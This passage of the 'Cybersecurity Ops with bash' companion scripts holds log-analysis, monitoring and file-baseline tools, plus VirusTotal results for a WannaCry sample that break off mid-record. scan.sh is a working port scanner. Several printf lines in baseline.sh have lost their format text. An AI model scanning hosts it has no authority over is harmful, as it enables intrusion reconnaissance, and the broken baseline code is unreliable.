Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1" 200 1385 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:25:46 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - 
[12/Nov/2017:19:26:04 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"

================================================
FILE: ch07/countem.awk
================================================
# Cybersecurity Ops with bash
# countem.awk
#
# Description:
# Count the number of instances of an item using awk
#
# Usage:
# countem.awk < inputfile
#

awk '{ cnt[$1]++ }
END { for (id in cnt) {
        printf "%d %s\n", cnt[id], id
      }
    }'

================================================
FILE: ch07/countem.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# countem.sh
#
# Description:
# Count the number of instances of an item using bash
#
# Usage:
# countem.sh < inputfile
#

declare -A cnt        # assoc. array             # <1>
while read id xtra                               # <2>
do
    let cnt[$id]++                               # <3>
done
# now display what we counted
# for each key in the (key, value) assoc. array
for id in "${!cnt[@]}"                           # <4>
do
    printf '%s %d\n' "$id" "${cnt[$id]}"         # <5>
done

================================================
FILE: ch07/histogram.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# histogram.sh
#
# Description:
# Generate a horizontal bar chart of specified data
#
# Usage: ./histogram.sh
#   input format: label value
#

function pr_bar ()                               # <1>
{
    local -i i raw maxraw scaled                 # <2>
    raw=$1
    maxraw=$2
    ((scaled=(MAXBAR*raw)/maxraw))               # <3>
    # min size guarantee
    ((raw > 0 && scaled == 0)) && scaled=1       # <4>

    # draw one '#' per scaled unit, then end the line
    for((i=0; i<scaled; i++)) ; do printf '#' ; done
    printf '\n'
}

declare -A RA         # assoc. array: label -> value   # <5>
declare -i MAXBAR max
max=0
MAXBAR=50    # how large the largest bar should be

while read labl val
do
    let RA[$labl]=$val                           # <6>
    # keep the largest value; for scaling
    (( val > max )) && max=$val
done

# scale and print it
for labl in "${!RA[@]}"                          # <7>
do
    printf '%-20.20s ' "$labl"
    pr_bar ${RA[$labl]} $max                     # <8>
done

================================================
FILE: ch07/histogram_plain.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# histogram_plain.sh
#
# Description:
# Generate a horizontal bar chart of specified data without
# using associative arrays, good for older versions of bash
#
# Usage: ./histogram_plain.sh
#   input format: label value
#

# pr_bar - same bar-drawing function as in histogram.sh,
# scaled by this script's maxbar
function pr_bar ()
{
    local -i i raw maxraw scaled
    raw=$1
    maxraw=$2
    ((scaled=(maxbar*raw)/maxraw))
    # min size guarantee
    ((raw > 0 && scaled == 0)) && scaled=1

    for ((i=0; i<scaled; i++)) ; do printf '#' ; done
    printf '\n'
}

declare -a RA_key RA_value                       # <1>
declare -i max ndx
max=0
maxbar=50    # how large the largest bar should be

ndx=0
while read labl val
do
    RA_key[$ndx]=$labl                           # <2>
    RA_value[$ndx]=$val
    # keep the largest value; for scaling
    (( val > max )) && max=$val
    let ndx++
done

# scale and print it
for ((j=0; j<ndx; j++))
do
    printf "%-20.20s " "${RA_key[$j]}"
    pr_bar ${RA_value[$j]} $max
done
================================================
FILE: ch07/pagereq.awk
================================================
# Cybersecurity Ops with bash
# pagereq.awk
#
# Description:
# Count the number of page requests for a given IP address using awk
#
# Usage:
# pagereq < inputfile
# IP address to search for
#

# count the number of page requests from an address ($1)
awk -v page="$1" '{ if ($1==page) {cnt[$7]+=1 } }    # <1>
END { for (id in cnt) {                              # <2>
        printf "%8d %s\n", cnt[id], id
      }
    }'

================================================
FILE: ch07/pagereq.sh
================================================
# Cybersecurity Ops with bash
# pagereq.sh
#
# Description:
# Count the number of page requests for a given IP address using bash
#
# Usage:
# pagereq < inputfile
# IP address to search for
#

declare -A cnt                                       # <1>
while read addr d1 d2 datim gmtoff getr page therest
do
    # quote $addr so it is compared literally, not as a glob pattern
    if [[ $1 == "$addr" ]] ; then let cnt[$page]+=1 ; fi
done
# quote the expansions so paths containing ? or * are not globbed
for id in "${!cnt[@]}"                               # <2>
do
    printf "%8d %s\n" "${cnt[$id]}" "$id"
done

================================================
FILE: ch07/summer.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# summer.sh
#
# Description:
# Sum the total of field 2 values for each unique field 1
#
# Usage: ./summer.sh
#   input format:
#

declare -A cnt        # assoc. array
while read id count
do
    let cnt[$id]+=$count
done
for id in "${!cnt[@]}"
do
    printf "%-15s %8d\n" "${id}" "${cnt[${id}]}"     #<1>
done

================================================
FILE: ch07/useragents.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# useragents.sh
#
# Description:
# Read through a log looking for unknown user agents
#
# Usage: ./useragents.sh <
# Apache access log
#

# mismatch - search through the array of known names
#    returns 1 (false) if it finds a match
#    returns 0 (true) if there is no match
function mismatch ()                                 # <1>
{
    local -i i                                       # <2>
    for ((i=0; i<$KNSIZE; i++))
    do
        [[ "$1" =~ .*${KNOWN[$i]}.* ]] && return 1   # <3>
    done
    return 0
}

# read up the known ones
readarray -t KNOWN < "useragents.txt"                # <4>
KNSIZE=${#KNOWN[@]}                                  # <5>

# preprocess logfile (stdin) to pick out ipaddr and user agent
awk -F'"' '{print $1, $6}' | \
while read ipaddr dash1 dash2 dtstamp delta useragent    # <6>
do
    if mismatch "$useragent"
    then
        echo "anomaly: $ipaddr $useragent"
    fi
done

================================================
FILE: ch07/useragents.txt
================================================
Firefox
Chrome
Safari
Edge

================================================
FILE: ch08/livebar.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# livebar.sh
#
# Description:
# Creates a rolling horizontal bar chart of live data
#
# Usage:
# | bash livebar.sh
#

function pr_bar ()                                   # <1>
{
    local raw maxraw scaled
    raw=$1
    maxraw=$2
    ((scaled=(maxbar*raw)/maxraw))
    ((scaled == 0)) && scaled=1    # min size guarantee
    # draw one '#' per scaled unit, then end the line
    for((i=0; i<scaled; i++)) ; do printf '#' ; done
    printf '\n'
}

# widest bar in characters; the definition is missing from the page, 60 is assumed
maxbar=60                                            # <2>
MAX=60
while read dayst timst qty
do
    if (( qty > MAX ))                               # <3>
    then
        let MAX=$qty+$qty/4    # allow some room
        echo " **** rescaling: MAX=$MAX"
    fi
    printf '%6.6s %6.6s %4d:' $dayst $timst $qty     # <4>
    pr_bar $qty $MAX
done

================================================
FILE: ch08/looper.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# looper.sh
#
# Description:
# Count the lines in a file being tailed -f
# Report the count interval on every SIGUSR1
#
# Usage: ./looper.sh [filename]
#   filename of file to be tailed, default: log.file
#

function interval ()                                 # <1>
{
    echo $(date '+%y%m%d %H%M%S') $cnt               # <2>
    cnt=0
}

declare -i cnt=0
trap interval SIGUSR1                                # <3>

shopt -s lastpipe                                    # <4>

tail -f --pid=$$ ${1:-log.file} | while read aline   # <5>
do
    let cnt++
done

================================================
FILE: ch08/tailcount.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# tailcount.sh
#
# Description:
# Count lines every n seconds
#
# Usage: ./tailcount.sh [filename]
#   filename: passed to looper.sh
#

# cleanup - the other processes on exit
function cleanup ()
{
    [[ -n $LOPID ]] && kill $LOPID                   # <1>
}

trap cleanup EXIT                                    # <2>

bash looper.sh $1 &                                  # <3>
LOPID=$!                                             # <4>
# give it a chance to start up
sleep 3

while true
do
    kill -SIGUSR1 $LOPID
    sleep 5
done >&2                                             # <5>

================================================
FILE: ch08/wintail.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# wintail.sh
#
# Description:
# Perform a tail-like function on a Windows log
#
# Usage: ./wintail.sh
#

WINLOG="Application"  #<1>

LASTLOG=$(wevtutil qe "$WINLOG" //c:1 //rd:true //f:text)  #<2>

while true
do
    CURRENTLOG=$(wevtutil qe "$WINLOG" //c:1 //rd:true //f:text)  #<3>
    if [[ "$CURRENTLOG" != "$LASTLOG" ]]
    then
        echo "$CURRENTLOG"
        echo "----------------------------------"
        LASTLOG="$CURRENTLOG"
    fi
done

================================================
FILE: ch09/autoscan.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# autoscan.sh
#
# Description:
# Automatically performs a port scan (using scan.sh),
# compares output to previous results, and emails user
# Assumes that scan.sh is in the current directory.
#
# Usage: ./autoscan.sh
#

./scan.sh < hostlist                                 # <1>

FILELIST=$(ls scan_* | tail -2)                      # <2>
FILES=( $FILELIST )

TMPFILE=$(tempfile)                                  # <3>

./fd2.sh ${FILES[0]} ${FILES[1]} > $TMPFILE

if [[ -s $TMPFILE ]]   # non-empty                   # <4>
then
    echo "mailing today's port differences to $USER"
    mail -s "today's port differences" $USER < $TMPFILE   # <5>
fi
# clean up
rm -f $TMPFILE                                       # <6>

================================================
FILE: ch09/fd2.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# fd2.sh
#
# Description:
# Compares two port scans to find changes
# MAJOR ASSUMPTION: both files have the same # of lines,
# each line with the same host address
# though with possibly different listed ports
#
# Usage: ./fd2.sh
#

# look for "$LOOKFOR" in the list of args to this function
# returns true (0) if it is not in the list
function NotInList ()                                # <1>
{
    for port in "$@"
    do
        if [[ $port == $LOOKFOR ]]
        then
            return 1
        fi
    done
    return 0
}

while true
do
    read aline <&4 || break    # at EOF               # <2>
    read bline <&5 || break    # at EOF, for symmetry # <3>

    # if [[ $aline == $bline ]] ; then continue; fi
    [[ $aline == $bline ]] && continue;              # <4>

    # there's a difference, so we
    # subdivide into host and ports
    HOSTA=${aline%% *}                               # <5>
    PORTSA=( ${aline#* } )                           # <6>

    HOSTB=${bline%% *}
    PORTSB=( ${bline#* } )

    echo $HOSTA    # identify the host which changed

    for porta in ${PORTSA[@]}
    do                                               # <7>
        LOOKFOR=$porta NotInList ${PORTSB[@]} && echo " closed: $porta"
    done

    for portb in ${PORTSB[@]}
    do
        LOOKFOR=$portb NotInList ${PORTSA[@]} && echo " new: $portb"
    done

done 4< ${1:-day1.data} 5< ${2:-day2.data}           # <8>
# day1.data and day2.data are default names to make it easier to test

================================================
FILE: ch09/scan.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# scan.sh
#
# Description:
# Perform a port scan of a specified host
#
# Usage: ./scan.sh
# File to save results in
#

function scan ()
{
    host=$1
    printf '%s' "$host"                                      # <1>
    for ((port=1;port<1024;port++))
    do
        # order of redirects is important for 2 reasons
        echo >/dev/null 2>&1 < /dev/tcp/${host}/${port}      # <2>
        if (($? == 0)) ; then printf ' %d' "${port}" ; fi    # <3>
    done
    echo # or printf '\n'
}

#
# main loop
#    read in each host name (from stdin)
#     and scan for open ports
#    save the results in a file
#    whose name is supplied as an argument
#     or default to one based on today's date
#

printf -v TODAY 'scan_%(%F)T' -1   # e.g., scan_2017-11-27   # <4>
OUTFILE=${1:-$TODAY}                                         # <5>

while read HOSTNAME
do
    scan $HOSTNAME
done > $OUTFILE                                              # <6>

================================================
FILE: ch10/baseline.sh
================================================
#!/bin/bash
# baseline.sh - compare baselines
# and report on differences
#

function usageErr ()
{
    echo 'usage: baseline.sh [-d path] file1 [file2]'
    echo 'creates or compares a baseline from path'
    echo 'default for path is /'
    exit 2
} >&2                                                    # <1>

function dosumming ()
{
    find "${DIR[@]}" -type f | xargs -d '\n' sha1sum     # <2>
}

# ===============================
# MAIN
# ===============================

declare -a DIR

# ---------- parse the arguments

while getopts "d:" MYOPT                                 # <3>
do
    # no check for MYOPT since there is only one choice
    DIR+=( "$OPTARG" )                                   # <4>
done
shift $((OPTIND-1))                                      # <5>

# no arguments? too many?
(( $# == 0 || $# > 2 )) && usageErr

(( ${#DIR[*]} == 0 )) && DIR=( "/" )                     # <6>

# create either a baseline (only 1 filename provided)
# or a secondary summary (when two filenames are provided)

BASE="$1"
B2ND="$2"

if (( $# == 1 ))    # only 1 arg.
then
    # creating "$BASE"
    dosumming > "$BASE"
    # all done for baseline
    exit
fi

if [[ ! -r "$BASE" ]]
then
    usageErr
fi

# --------- on to the actual work:
# if 2nd file exists just compare the two
# else create/fill it
if [[ ! -e "$B2ND" ]]
then
    echo creating "$B2ND"
    dosumming > "$B2ND"
fi

# now we have: 2 files created by sha1sum
declare -A BYPATH BYHASH INUSE    # assoc. arrays

# load up the first file as the baseline
while read HNUM FN
do
    BYPATH["$FN"]=$HNUM
    BYHASH[$HNUM]="$FN"
    INUSE["$FN"]="X"
done < "$BASE"

# ------ now begin the output
# see if each filename listed in the 2nd file is in
# the same place (path) as in the 1st (the baseline)

printf '\n' "$HOSTNAME" "${DIR[*]}"

while read HNUM FN                                       # <7>
do
    WASHASH="${BYPATH[${FN}]}"
    # did it find one? if not, it will be null
    if [[ -z $WASHASH ]]
    then
        ALTFN="${BYHASH[$HNUM]}"
        if [[ -z $ALTFN ]]
        then
            # neither this path nor this hash is in the baseline: new file
            printf ' %s\n' "$FN"
        else
            # same hash under a different path: file was relocated
            printf ' %s\n' "$ALTFN" "$FN"
            INUSE["$ALTFN"]='_'    # mark this as seen
        fi
    else
        INUSE["$FN"]='_'    # mark this as seen
        if [[ $HNUM == $WASHASH ]]
        then
            continue;    # nothing changed;
        else
            # same path, different hash: contents changed
            printf ' %s\n' "$FN"
        fi
    fi
done < "$B2ND"                                           # <8>

# baseline entries never marked as seen no longer exist: removed files
for FN in "${!INUSE[@]}"
do
    if [[ "${INUSE[$FN]}" == 'X' ]]
    then
        printf ' %s\n' "$FN"
    fi
done

printf '\n'

================================================
FILE: ch11/Calc_VT.txt
================================================
{"scans": {"Bkav": {"detected": false, "version": "1.3.0.9466", "result": null, "update": "20180712"}, "MicroWorld-eScan": {"detected": false, "version": "14.0.297.0", "result": null, "update": "20180712"}, "VBA32": {"detected": false, "version": "3.12.32.0", "result": null, "update": "20180712"}, "CMC": {"detected": false, "version": "1.1.0.977", "result": null, "update": "20180712"}, "CAT-QuickHeal": {"detected": false, "version": "14.00", "result": null, "update": "20180712"}, "McAfee": {"detected": false, "version": "6.0.6.653", "result": null, "update": "20180712"}, "Cylance": {"detected": true, "version": "2.3.1.101", "result": "Unsafe", "update": "20180712"}, "AegisLab": {"detected": false, "version": "4.2", "result": null, "update": "20180712"}, "CrowdStrike": {"detected": false, "version": "1.0", "result": null, "update": "20180530"}, "K7GW": {"detected": false, "version": "10.53.27735", "result": null, "update": "20180712"}, "K7AntiVirus": {"detected": false, "version": "10.53.27740", "result": null,
"update": "20180712"}, "TheHacker": {"detected": false, "version": "6.8.0.5.3314", "result": null, "update": "20180712"}, "TrendMicro": {"detected": false, "version": "10.0.0.1040", "result": null, "update": "20180712"}, "Baidu": {"detected": false, "version": "1.0.0.2", "result": null, "update": "20180712"}, "NANO-Antivirus": {"detected": false, "version": "1.0.116.23366", "result": null, "update": "20180712"}, "F-Prot": {"detected": false, "version": "4.7.1.166", "result": null, "update": "20180712"}, "Symantec": {"detected": false, "version": "1.6.0.0", "result": null, "update": "20180712"}, "ESET-NOD32": {"detected": false, "version": "17703", "result": null, "update": "20180712"}, "TrendMicro-HouseCall": {"detected": false, "version": "9.950.0.1006", "result": null, "update": "20180712"}, "Paloalto": {"detected": false, "version": "1.0", "result": null, "update": "20180712"}, "ClamAV": {"detected": false, "version": "0.100.1.0", "result": null, "update": "20180712"}, "Kaspersky": {"detected": false, "version": "15.0.1.13", "result": null, "update": "20180712"}, "BitDefender": {"detected": false, "version": "7.2", "result": null, "update": "20180712"}, "Babable": {"detected": false, "version": "9107201", "result": null, "update": "20180406"}, "ViRobot": {"detected": false, "version": "2014.3.20.0", "result": null, "update": "20180712"}, "Avast": {"detected": false, "version": "18.4.3895.0", "result": null, "update": "20180712"}, "Tencent": {"detected": false, "version": "1.0.0.1", "result": null, "update": "20180712"}, "Endgame": {"detected": false, "version": "3.0.0", "result": null, "update": "20180711"}, "Sophos": {"detected": false, "version": "4.98.0", "result": null, "update": "20180712"}, "Comodo": {"detected": false, "version": "29334", "result": null, "update": "20180712"}, "F-Secure": {"detected": false, "version": "11.0.19100.45", "result": null, "update": "20180712"}, "DrWeb": {"detected": false, "version": "7.0.33.6080", "result": null, "update": 
"20180712"}, "VIPRE": {"detected": false, "version": "68060", "result": null, "update": "20180712"}, "Invincea": {"detected": false, "version": "6.3.5.26121", "result": null, "update": "20180601"}, "McAfee-GW-Edition": {"detected": false, "version": "v2017.3010", "result": null, "update": "20180712"}, "Emsisoft": {"detected": false, "version": "2018.4.0.1029", "result": null, "update": "20180712"}, "SentinelOne": {"detected": false, "version": "1.0.17.227", "result": null, "update": "20180701"}, "Cyren": {"detected": false, "version": "6.0.0.4", "result": null, "update": "20180712"}, "Jiangmin": {"detected": false, "version": "16.0.100", "result": null, "update": "20180712"}, "Webroot": {"detected": false, "version": "1.0.0.403", "result": null, "update": "20180712"}, "Avira": {"detected": false, "version": "8.3.3.6", "result": null, "update": "20180710"}, "MAX": {"detected": false, "version": "2017.11.15.1", "result": null, "update": "20180712"}, "Antiy-AVL": {"detected": false, "version": "3.0.0.1", "result": null, "update": "20180712"}, "Kingsoft": {"detected": false, "version": "2013.8.14.323", "result": null, "update": "20180712"}, "Microsoft": {"detected": false, "version": "1.1.15000.2", "result": null, "update": "20180712"}, "Arcabit": {"detected": false, "version": "1.0.0.831", "result": null, "update": "20180712"}, "SUPERAntiSpyware": {"detected": false, "version": "5.6.0.1032", "result": null, "update": "20180712"}, "ZoneAlarm": {"detected": false, "version": "1.0", "result": null, "update": "20180712"}, "Avast-Mobile": {"detected": false, "version": "180711-22", "result": null, "update": "20180712"}, "GData": {"detected": false, "version": "A:25.17758B:25.12706", "result": null, "update": "20180712"}, "AhnLab-V3": {"detected": false, "version": "3.13.1.21452", "result": null, "update": "20180712"}, "ALYac": {"detected": false, "version": "1.1.1.5", "result": null, "update": "20180712"}, "AVware": {"detected": false, "version": "1.6.0.52", "result": 
null, "update": "20180712"}, "TACHYON": {"detected": false, "version": "2018-07-12.02", "result": null, "update": "20180712"}, "Ad-Aware": {"detected": false, "version": "3.0.5.370", "result": null, "update": "20180712"}, "Malwarebytes": {"detected": false, "version": "2.1.1.1115", "result": null, "update": "20180712"}, "Zoner": {"detected": false, "version": "1.0", "result": null, "update": "20180711"}, "Rising": {"detected": false, "version": "25.0.0.20", "result": null, "update": "20180712"}, "Yandex": {"detected": false, "version": "5.5.1.3", "result": null, "update": "20180712"}, "Ikarus": {"detected": false, "version": "0.1.5.2", "result": null, "update": "20180712"}, "eGambit": {"detected": false, "version": null, "result": null, "update": "20180712"}, "Fortinet": {"detected": false, "version": "5.4.247.0", "result": null, "update": "20180712"}, "AVG": {"detected": false, "version": "18.4.3895.0", "result": null, "update": "20180712"}, "Cybereason": {"detected": false, "version": "1.2.27", "result": null, "update": "20180225"}, "Panda": {"detected": false, "version": "4.6.4.2", "result": null, "update": "20180712"}, "Qihoo-360": {"detected": false, "version": "1.0.0.1120", "result": null, "update": "20180712"}}, "scan_id": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd-1531411370", "sha1": "1a4e2c3bbc095cb7d9b85cabe2aea2c9a769b480", "resource": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd", "response_code": 1, "scan_date": "2018-07-12 16:02:50", "permalink": "https://www.virustotal.com/file/284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd/analysis/1531411370/", "verbose_msg": "Scan finished, information embedded", "total": 66, "positives": 1, "sha256": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd", "md5": "afaf2cdf9981342c494b28630608f74a"} ================================================ FILE: ch11/WannaCry_VT.txt ================================================ {"scans": {"Bkav": 
{"detected": true, "version": "1.3.0.9466", "result": "W32.WannaCrypLTE.Trojan", "update": "20180712"}, "MicroWorld-eScan": {"detected": true, "version": "14.0.297.0", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "CMC": {"detected": false, "version": "1.1.0.977", "result": null, "update": "20180712"}, "CAT-QuickHeal": {"detected": true, "version": "14.00", "result": "Trojan.Mauvaise.SL1", "update": "20180712"}, "McAfee": {"detected": true, "version": "6.0.6.653", "result": "Ransom-O", "update": "20180712"}, "Cylance": {"detected": true, "version": "2.3.1.101", "result": "Unsafe", "update": "20180712"}, "Zillya": {"detected": true, "version": "2.0.0.3593", "result": "Trojan.WannaCryptGen.Win32.2", "update": "20180712"}, "SUPERAntiSpyware": {"detected": true, "version": "5.6.0.1032", "result": "Ransom.WannaCrypt/Variant", "update": "20180712"}, "TheHacker": {"detected": true, "version": "6.8.0.5.3314", "result": "Trojan/Exploit.CVE-2017-0147.a", "update": "20180712"}, "K7GW": {"detected": true, "version": "10.53.27735", "result": "Exploit ( 0050d7a31 )", "update": "20180712"}, "K7AntiVirus": {"detected": true, "version": "10.53.27740", "result": "Exploit ( 0050d7a31 )", "update": "20180712"}, "Arcabit": {"detected": false, "version": "1.0.0.831", "result": null, "update": "20180712"}, "TrendMicro": {"detected": true, "version": "10.0.0.1040", "result": "WORM_WCRY.A", "update": "20180712"}, "Baidu": {"detected": true, "version": "1.0.0.2", "result": "Win32.Worm.Rbot.a", "update": "20180712"}, "NANO-Antivirus": {"detected": true, "version": "1.0.116.23366", "result": "Trojan.Win32.Wanna.eoqegc", "update": "20180712"}, "Cyren": {"detected": true, "version": "6.0.0.4", "result": "W32/Trojan.ZTSA-8671", "update": "20180712"}, "Symantec": {"detected": true, "version": "1.6.0.0", "result": "Ransom.Wannacry", "update": "20180712"}, "TotalDefense": {"detected": false, "version": "37.1.62.1", "result": null, "update": "20180712"}, "TrendMicro-HouseCall": 
{"detected": true, "version": "9.950.0.1006", "result": "WORM_WCRY.A", "update": "20180712"}, "Avast": {"detected": true, "version": "18.4.3895.0", "result": "Win32:WanaCry-A [Trj]", "update": "20180712"}, "ClamAV": {"detected": true, "version": "0.100.1.0", "result": "Win.Ransomware.WannaCry-6313787-0", "update": "20180712"}, "Kaspersky": {"detected": true, "version": "15.0.1.13", "result": "Trojan-Ransom.Win32.Wanna.m", "update": "20180712"}, "BitDefender": {"detected": true, "version": "7.2", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "Babable": {"detected": false, "version": "9107201", "result": null, "update": "20180406"}, "Paloalto": {"detected": true, "version": "1.0", "result": "generic.ml", "update": "20180712"}, "AegisLab": {"detected": true, "version": "4.2", "result": "Troj.Ransom.W32!c", "update": "20180712"}, "Rising": {"detected": true, "version": "25.0.0.20", "result": "Exploit.EternalBlue!1.AAED (CLASSIC)", "update": "20180712"}, "Ad-Aware": {"detected": true, "version": "3.0.5.370", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "Emsisoft": {"detected": true, "version": "2018.4.0.1029", "result": "Trojan-Ransom.WanaCrypt0r (A)", "update": "20180712"}, "Comodo": {"detected": true, "version": "29335", "result": "TrojWare.Win32.WannaCry.jet", "update": "20180712"}, "F-Secure": {"detected": true, "version": "11.0.19100.45", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "DrWeb": {"detected": true, "version": "7.0.33.6080", "result": "Trojan.Encoder.11432", "update": "20180712"}, "VIPRE": {"detected": true, "version": "68066", "result": "Trojan.Win32.Generic!BT", "update": "20180712"}, "Invincea": {"detected": true, "version": "6.3.5.26121", "result": "heuristic", "update": "20180601"}, "McAfee-GW-Edition": {"detected": true, "version": "v2017.3010", "result": "BehavesLike.Win32.RansomWannaCry.wc", "update": "20180712"}, "Sophos": {"detected": true, "version": "4.98.0", "result": 
"Troj/Ransom-EMG", "update": "20180712"}, "SentinelOne": {"detected": true, "version": "1.0.17.227", "result": "static engine - malicious", "update": "20180701"}, "F-Prot": {"detected": true, "version": "4.7.1.166", "result": "W32/WannaCrypt.D", "update": "20180712"}, "Jiangmin": {"detected": true, "version": "16.0.100", "result": "Trojan.WanaCry.i", "update": "20180712"}, "Webroot": {"detected": true, "version": "1.0.0.403", "result": "W32.Ransom.Wannacry", "update": "20180712"}, "Avira": {"detected": true, "version": "8.3.3.6", "result": "TR/Ransom.IZ", "update": "20180712"}, "Fortinet": {"detected": true, "version": "5.4.247.0", "result": "W32/WannaCryptor.H!tr.ransom", "update": "20180712"}, "Antiy-AVL": {"detected": true, "version": "3.0.0.1", "result": "Trojan[Ransom]/Win32.Scatter", "update": "20180712"}, "Kingsoft": {"detected": false, "version": "2013.8.14.323", "result": null, "update": "20180712"}, "Endgame": {"detected": true, "version": "3.0.0", "result": "malicious (high confidence)", "update": "20180711"}, "Microsoft": {"detected": true, "version": "1.1.15000.2", "result": "Ransom:Win32/WannaCrypt", "update": "20180712"}, "ViRobot": {"detected": true, "version": "2014.3.20.0", "result": "Trojan.Win32.S.WannaCry.3723264.S", "update": "20180712"}, "ZoneAlarm": {"detected": true, "version": "1.0", "result": "Trojan-Ransom.Win32.Wanna.m", "update": "20180712"}, "Avast-Mobile": {"detected": false, "version": "180711-22", "result": null, "update": "20180712"}, "TACHYON": {"detected": true, "version": "2018-07-12.02", "result": "Ransom/W32.WannaCry.Zen", "update": "20180712"}, "AhnLab-V3": {"detected": true, "version": "3.13.1.21452", "result": "Trojan/Win32.WannaCryptor.R200572", "update": "20180712"}, "ALYac": {"detected": true, "version": "1.1.1.5", "result": "Trojan.Ransom.WannaCryptor", "update": "20180712"}, "AVware": {"detected": true, "version": "1.6.0.52", "result": "Trojan.Win32.Generic!BT", "update": "20180712"}, "MAX": {"detected": true, 
